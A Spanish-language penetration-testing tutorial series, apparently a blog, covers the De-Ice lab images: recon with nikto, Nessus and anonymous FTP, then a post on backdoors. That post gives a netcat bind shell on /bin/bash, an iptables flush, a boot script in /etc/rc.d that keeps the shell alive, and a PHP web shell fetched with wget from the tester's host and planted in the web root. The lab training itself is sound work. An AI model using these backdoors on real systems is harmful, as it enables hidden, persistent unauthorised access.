Ya hemos realizado varios escaneos al sistema y hemos identificado los servicios que se ejecutan en este. Pasemos ahora a recolectar información sensible del sistema o de interés para posibles ataques.

Se hace necesario realizar varios tipos de test; entre ellos un escaneo de directorios y archivos (árbol de directorios del aplicativo web), pruebas de conexión a los diferentes servicios, etc. Todos estos procedimientos son detallados en las metodologías ISSAF y OSSTMM.

Si observamos la página web del sistema objetivo, esta nos ofrece información sobre la finalidad del sistema y de las personas/usuarios que administran/utilizan el servidor. Estos son:

Sr. System Admin: Adam Adams – adamsa@herot.net
System Admin (Intern): Bob Banter – banterb@herot.net
System Admin: Chad Coffee – coffeec@herot.net

Muy posiblemente los usuarios válidos en el sistema sean:

• adamsa
• banterb
• coffeec

Y estos nos sirvan para llevar a cabo un ataque de autenticación a los servicios que actualmente ofrece (FTP, SSH)

Aun así y con el objetivo de recolectar más información realicemos un escaneo de directorios y vulnerabilidades web con la herramienta nikto.

root@bt:/pentest/web/nikto# perl nikto.pl -h http://192.168.1.110

- Nikto v2.1.0
—————————————————————————
+ Target IP:          192.168.1.110
+ Target Hostname:    192.168.1.110
+ Target Port:        80
+ Start Time:         2010-01-22 20:49:26
—————————————————————————
+ Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2
+ OSVDB-0: mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-0: Apache/2.2.4 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.
+ OSVDB-0: mod_ssl/2.2.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-0: OpenSSL/0.9.8b appears to be outdated (current is at least 0.9.8i) (may depend on server version)
+ 3588 items checked: 6 item(s) reported on remote host
+ End Time:           2010-01-22 20:50:02 (36 seconds)
—————————————————————————
+ 1 host(s) tested

Pasemos ahora a explorar el código fuente del sitio Web con el objetivo de buscar información oculta. Para ello realizaremos una descarga de todo el Website con la herramienta WGet.

root@bt:~/Sec-Track/De-Ice_II# wget -r http://192.168.1.110

–2010-01-21 21:02:52–  http://192.168.1.110/
Connecting to 192.168.1.110:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2036 (2.0K) [text/html]
Saving to: `192.168.1.110/index.html’

100%[======================================>] 2,036       –.-K/s   in 0s

2010-01-21 21:02:52 (103 MB/s) – `192.168.1.110/index.html’ saved [2036/2036]

Loading robots.txt; please ignore errors.
–2010-01-21 21:02:52–  http://192.168.1.110/robots.txt
Reusing existing connection to 192.168.1.110:80.
HTTP request sent, awaiting response… 404 Not Found
2010-01-21 21:02:52 ERROR 404: Not Found.

–2010-01-21 21:02:52–  http://192.168.1.110/level.html
Reusing existing connection to 192.168.1.110:80.
HTTP request sent, awaiting response… 200 OK
Length: 2309 (2.3K) [text/html]
Saving to: `192.168.1.110/level.html’

100%[======================================>] 2,309       –.-K/s   in 0s

2010-01-21 21:02:52 (157 MB/s) – `192.168.1.110/level.html’ saved [2309/2309]

–2010-01-21 21:02:52–  http://192.168.1.110/copyright.txt
Reusing existing connection to 192.168.1.110:80.
HTTP request sent, awaiting response… 200 OK
Length: 15719 (15K) [text/plain]
Saving to: `192.168.1.110/copyright.txt’

100%[======================================>] 15,719      –.-K/s   in 0s

2010-01-21 21:02:52 (177 MB/s) – `192.168.1.110/copyright.txt’ saved [15719/15719]

–2010-01-21 21:02:52–  http://192.168.1.110/index2.html
Reusing existing connection to 192.168.1.110:80.
HTTP request sent, awaiting response… 200 OK
Length: 847 [text/html]
Saving to: `192.168.1.110/index2.html’

100%[======================================>] 847         –.-K/s   in 0.001s

2010-01-21 21:02:52 (968 KB/s) – `192.168.1.110/index2.html’ saved [847/847]

FINISHED –2010-01-21 21:02:52–
Downloaded: 4 files, 20K in 0.001s (20.5 MB/s)

Luego de analizar los archivos descargados pudimos darnos cuenta que no existe ninguna información de relevancia para el Test de Penetración. Lo que si pudimos encontrar fue un archivo (level.html) con información relacionada con el entorno De-Ice LiveCD II:

<B><I>The disk is considered Level 1</I></B>, and minimal penetration skills are required in order to exploit this disk.  Additional skills required to complete this challenge is a more-than-basic understanding of unix commands and basic functionality of the unix OS.  All tools needed to exploit this disk can be found on the BackTrack Penetration LiveCD (version 2) found at Remote-Exploit.org.  No additional downloads or disks are needed.
<BR><BR>
<B>Minimum time required to penetrate this CD is:  30 Minutes (approx.)</B><BR>
This time is only possible if you know exactly what to do, and in what order.  Do not get frustrated if penetration of this system exceeds hours, or even days.
This exercise is intended to provide a real-world simulation of a penetration test task.  Sometimes, banging your head IS the answer… so bang away.  >;-)

etc….

En la fase anterior no pudimos identificar el banner del servicio que se ejecutaba en el puerto 22 (SSH) con nmap, para esto simplemente ejecuto la herramienta Netcat:

root@bt:~# nc 192.168.1.110 22

SSH-1.99-OpenSSH_4.3

Además de esto vamos a realizar un escaneo de vulnerabilidades con la herramienta Nessus.

Para ello voy a deshabilitar todos los plugins que vienen activos por defecto, pues solo vamos a requerir algunos que están relacionados con los puertos y servicios que identificamos en la primera fase del Test de Penetración.

Brute Force Attacks

• Hydra FTP
• Hydra SSH2

FTP

• Anonymous FTP Enabled
• Anonymous FTP Writeable root Directory
• FTP Privileged Port Bounce Scan
• FTP Server Any Command Accepted (Possible Backdoor Proxy)
• FTP Server Bad Command Sequence Accepted (Possible Backdoor Proxy)
• FTP Server Copyrighted Material Present
• FTP Server No Command Accepted (Possible Backdoor Proxy)
• Etc…

Finger Abuses

• Finger .@host Unused Account Disclosure
• Finger 0@host Unused Account Disclosure
• Finger Service Remote Information Disclosure
• Etc…

General

• Enumerate
• OS Identification
• OS Identification FTP
• OS Identification HTTP
• OS Identification ICMP
• OS Identification Linux Distribution
• OS Identification SSH

Web Servers

• Apache
• PHP
• Etc…

Gain a Shell Remotely

• OpenSSH
• OpenSSL
• Shell Command Execution Vulnerability
• Etc…

Entre otras…

Como vemos este escaneo está configurado de manera muy general, y enfocado únicamente a los servicios  encontrados con Nmap. Por ello solo encontramos las siguientes Alertas de Seguridad en el resultado de Nessus.

Nessus Report
The Nessus Security Scanner was used to assess the security of 1 host

• 2 security warnings have been found
• 1 security note has been found

List of open ports :

• ssh (22/tcp)
• ipp (631/tcp)
• http (80/tcp)
• ftp (21/tcp)  (Security warnings found

Warning found on port ftp (21/tcp)
Synopsis :

Anonymous logins are allowed on the remote FTP server.
Description :

This FTP service allows anonymous logins. Any remote user may connect and authenticate without providing a password or unique credentials. This allows a user to access any files made available on the FTP server.

Solution :

Disable anonymous FTP if it is not required. Routinely check the FTP server to ensure sensitive content is not available.

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)

CVE : CVE-1999-0497
Other references : OSVDB:69
Nessus ID : 10079

————————————————————————————————————————

Warning found on port ftp (21/tcp)
Synopsis :

The remote FTP server contains world-writable directories.

Description :

By crawling through the remote FTP server, Nessus discovered several directories were marked as being world-writable.

This could have several negative impacts:

* Temporary file uploads are sometimes immediately available to all anonymous users, allowing the FTP server to be used as a ‘drop’ point. This may faciliate trading copyrighted, pornographic or questionable material.

* A user may be able to upload large files that consume disk space, resulting in a denial of service condition.

* A user can upload a malicious program. If an administrator routinely checks the ‘incoming’ directory, they may load a document or run a program that exploits a vulnerability in client software.

Solution :

Configure the remote FTP directories so that they are not world-writable.

Risk factor :

Medium / CVSS Base Score : 6.4
(CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P)

Other references : OSVDB:76
Nessus ID : 19782

————————————————————————————————————————

Information found on port ftp (21/tcp)
Synopsis :

The remote FTP server allows credentials to be transmitted in clear text.

Description :

The remote FTP does not encrypt its data and control connections. The user name and password are transmitted in clear text and may be intercepted by a network sniffer, or a man-in-the-middle attack.

Solution :

Switch to SFTP (part of the SSH suite) or FTPS (FTP over SSL/TLS). In the latter case, configure the server such as data and control connections must be encrypted.

Risk factor :

Low / CVSS Base Score : 2.6
(CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)

Nessus ID : 34324)

————————————————————————————————————————

Finalmente comprobamos manualmente este acceso al servidor FTP que permite login anónimo.

root@bt:~/Sec-Track/De-Ice_II/192.168.1.110# ftp 192.168.1.110

Connected to 192.168.1.110.
220 (vsFTPd 2.0.4)
Name (192.168.1.110:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

En la próxima fase (post) llevaremos a cabo una primera exploración dentro del servidor FTP en busca de información sensible que nos permita elevar privilegios en el sistema objetivo. En caso de no encontrar nada relevante procederemos a intentar un login por medio del servidor SSH.

La finalidad de usar sistemas backdoors (puertas traseras) es mantener un acceso al sistema de manera oculta al administrador del sistema, los cuales permitirán una entrada luego de un reinicio del sistema o ciertas condiciones a la que se someta el sistema sin necesidad de penetrar nuevamente el sistema.

El tema de backdoors en sistemas es más un arte que una técnica, ya que esta obliga al PenTester a usar toda su creatividad e imaginación para lograr su objetivo de conseguir un acceso en cualquier momento al sistema sin ser descubierto.

Solo mostraré algunos métodos para crear puertas traseras con la herramienta Netcat y otro con el servicio de publicación en Web (PHP), con la finalidad de que los lectores se animen y publiquen los métodos que conozcan y nos vayamos preparando para los entornos que vienen.

Ya hemos hablado anteriormente de Netcat (Video Tutorial Netcat en BackTrack), ahora aprovechemos el entorno disponible para practicar los aprendido.

Para nuestra fortuna, en el entorno De-Ice I netcat se encuentra disponible en dicho sistema, por lo tanto solo necesitamos dejarlo a la escucha.

Antes de ello es necesario verificar como se encuentra configurado el sistema de IPTABLES con la finalidad de analizar como se realizan las conexiones al sistema (conexiones permitidas, conexiones denegadas, etc)

root@slax:/# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  –  anywhere             anywhere
ACCEPT     udp  –  anywhere             anywhere            udp dpt:domain
ACCEPT     udp  –  anywhere             anywhere            udp spt:domain
ACCEPT     all  –  anywhere             anywhere            state RELATED,ESTAB                                              LISHED
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:ftp-data
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:ftp
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:ssh
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:smtp
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:http
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:pop3
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:imap
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:https
LOG_DROP   all  –  anywhere             anywhere

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
LOG_DROP   all  –  anywhere             anywhere

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  –  anywhere             anywhere

Chain LOG_DROP (2 references)
target     prot opt source               destination
DROP       all  –  anywhere             anywhere

Si quisieramos tirar abajo todas las reglas (no recomendado para el objetivo de pasar desapercibido) solo basta con ejecutar la siguiente instrucción.

root@slax:/# iptables -F

La idea es que los lectores propongan una de las muchas maneras de agregar esta conexión a las reglas de IPTABLES sin tirar las demás abajo (Más información sobre IPTABLES y su configuración/edición)

Luego de esta “limpieza” de reglas vemos como quitamos la negación a peticiones ICMP que observamos al comienzo de la prueba.

S3cTr4cK@0100100-0100100 ~
$ ping 192.168.1.100

Pinging 192.168.1.100 with 32 bytes of data:

Reply from 192.168.1.100: bytes=32 time=1ms TTL=64
Reply from 192.168.1.100: bytes=32 time=1ms TTL=64

Ping statistics for 192.168.1.100:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1ms, Maximum = 1ms, Average = 1ms

Ahora ejecutemos a netcat en modo escucha en el sistema objetivo (De-Ice I)

root@slax:/# nc -l -p 1337 -e /bin/bash

Si realizaramos un escaneo sencillo con nmap a varios puertos incluyendo el que dejamos a la escucha, encontraríamos los siguientes:

C:\Program Files\Nmap>nmap -p 22,25,80,443,1337 192.168.1.100

Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-09 23:51 SA Pacific Standard T
Interesting ports on 192.168.1.100:
PORT     STATE  SERVICE
22/tcp   open   ssh
25/tcp   open   smtp
80/tcp   open   http
443/tcp  closed https
1337/tcp open   waste
MAC Address: 00:1A:73:90:81:0B (Gemtek Technology Co.)

Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds

Ahora desde nuestro sistema cliente (atacante) solo basta conectarnos al puerto que dejamos a la escucha (1337) y ejecutar algunos comandos:

C:\Documents and Settings\S3cTr4cK\My Documents\Descargas\nc>nc 192.168.1.100 1337
whoami
root
pwd
/
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:43:03:6B
inet addr:192.168.1.100  Bcast:192.168.1.255  Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe43:36b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:6377 errors:0 dropped:0 overruns:0 frame:0
TX packets:1365 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:438725 (428.4 KiB)  TX bytes:169876 (165.8 KiB)
Interrupt:5 Base address:0×2000

lo        Link encap:Local Loopback
inet addr:127.0.0.1  Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING  MTU:16436  Metric:1
RX packets:176 errors:0 dropped:0 overruns:0 frame:0
TX packets:176 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15878 (15.5 KiB)  TX bytes:15878 (15.5 KiB)

uname -a
Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 athlon-4 i386 GNU/Linux

Ahora bien… ¿Qué pasaría si quisieramos que dicha instrucción se ejecutara al inicio del sistema objetivo?

Solo basta automatizar dicho inicio alojando la instrucción (script) en el directorio /etc/rc.d

Veamos el contenido de este directorio y un ejemplo de script para dicho propósito:

Contenido:

root@slax:/etc/rc.d# ls
rc.0         rc.alsa      rc.inet1       rc.nfsd        rc.sshd
rc.4         rc.bind      rc.inet1.conf  rc.pcmcia      rc.syslog
rc.6         rc.cups      rc.inet2       rc.portmap     rc.sysvinit
rc.FireWall  rc.firewall  rc.inetd       rc.saslauthd   rc.udev
rc.K         rc.font.new  rc.ip_forward  rc.sendmail    rc.vsftpd
rc.M         rc.gpm       rc.local       rc.serial      rc.wireless
rc.S         rc.hotplug   rc.modules     rc.slax        rc.wireless.conf
rc.acpid     rc.httpd     rc.mysqld      rc.slaxconfig

Hagamos entonces lo mismo para Netcat

Script:

root@slax:/etc/rc.d# vi rc.netcat1
#!/bin/sh
mkdir /tmp/netcat
while true ; do
cd /tmp/netcat | nc -l -p 1337 -e /bin/bash
done

Y quedaría así:

root@slax:/etc/rc.d# more rc.netcat1
#!/bin/sh
mkdir /tmp/netcat
while true ; do
cd /tmp/netcat | nc -l -p 1337 -e /bin/bash
done

Otra buena opción sería utilizar a Netcat en modo reverse shell, que también ha sido tratado en el video tutorial citado anteriormente.

El tercer método para habilitar una puerta tracera en el sistema de manera más “discreta” puede ser el uso del servidor web en la máquina objetivo, veamos:

Para ello haremos uso de una shell en el leguaje del lado del servidor PHP.

Primero debemos descargarla y transferirla a la máquina objetivo.

Para la transferencia he habilitado un server en mi máquina, solo basta realizar la petición con wget:

root@slax:~/Desktop# wget http://192.168.1.3/shellphp.txt
–00:34:53–  http://192.168.1.3/shellphp.txt
=> `shellphp.txt’
Connecting to 192.168.1.3:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 63,743 (62K) [text/plain]

100%[====================================>] 63,743        –.–K/s

00:34:53 (64.06 MB/s) – `shellphp.txt’ saved [63743/63743]

root@slax:~/Desktop# ls
Home.desktop  System.desktop  shellphp.txt

root@slax:~/Desktop# cp shellphp.txt /var/www/htdocs/infosys.php

Luego solo bastaría con ingresar en cualquier momento a dicha URL, para mi caso:

http://192.168.1.100/infosys.php

etc…

Vuelvo y reitero la invitación a que los lectores compartan sus métodos para habilitar puertas traseras en sistemas.

En futuros entornos conoceremos algunos métodos aún más avanzados que los presentados en este post realizado a modo de introducción a los Backdoors.

En este video tutorial veremos algunos de los usos más comunes de Netcat:

Ayuda de Netcat:

• nc -h

Banner idetification:

• nc -v IP puerto

Peticiones con Netcat / Telnet > Diferencias:

• nc -v IP 80 < /ruta/file.txt

Netcat en modo escucha y ejecución de shell:

• nc -l Puerto -e /bin/bash

Netcat como scanner de puertos:

• nc -z -v IP rango-puertos

Video tutorial NetCat en BackTrack from Sec-Track on Vimeo.

Más información sobre Netcat >>

Netcat, la navaja suiza de TCP/IP >>

El objetivo consiste en identificar dicho servidor, descubrir y analizar las vulnerabilidades existentes en el mismo y penetrar el sistema.

Categoría: Fundamentación, Test de Penetración, Explotación de vulnerabilidades.

Nivel de Dificultad: Medio / Alto

Formato: Imágen VMWare

Objetivos/Técnicas: Mapeo de Red / O.S Fingerprint / Escaneo de Puertos / Identificación de Servicios / Escaneo de Vulnerabilidades / Identificación y Análisis de Vulnerabilidades / Explotación de Vulnerabilidades / Escalada de Privilegios / Extracción de Informacion Confidencial.

Herramientas/Recursos: OSSTMM

Configuracion: El router/tarjeta de red virtual/fisica debe tener DHCP activo.

Descargar (Imágen VMWare)

MD5:

Autor / Página Oficial / Más Información: www.0dayclub.com

El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.

Categoría: Fundamentación, Test de Penetración

Nivel de Dificultad: Bajo

Formato: .ISO / Imágen VMWare

Objetivos/Técnicas: Mapeo de Red / O.S Fingerprint / Escaneo de Puertos / Identificación de Servicios / Escaneo de Vulnerabilidades / Identificación y Análisis de Vulnerabilidades / Explotación de Vulnerabilidades / Escalada de Privilegios / Extracción de Información Confidencial.

Herramientas/Recursos: OSSTMM / Nmap / Xhydra / Netcat / Medusa / NetDiscover / Nessus

Configuracion: Este entorno esta configurado para que de manera automática obtenga la dirección IP  192.168.1.100. El router/tarjeta de red virtual/física debe tener DHCP activo, la dirección de inicio debe ser 192.168.1.2 y la máscara de subred 255.255.255.0

Descargar (ISO)

MD5: a3341316ca9860b3a0acb06bdc58bbc1

Autor / Página Oficial / Mas Información: www.Heorot.net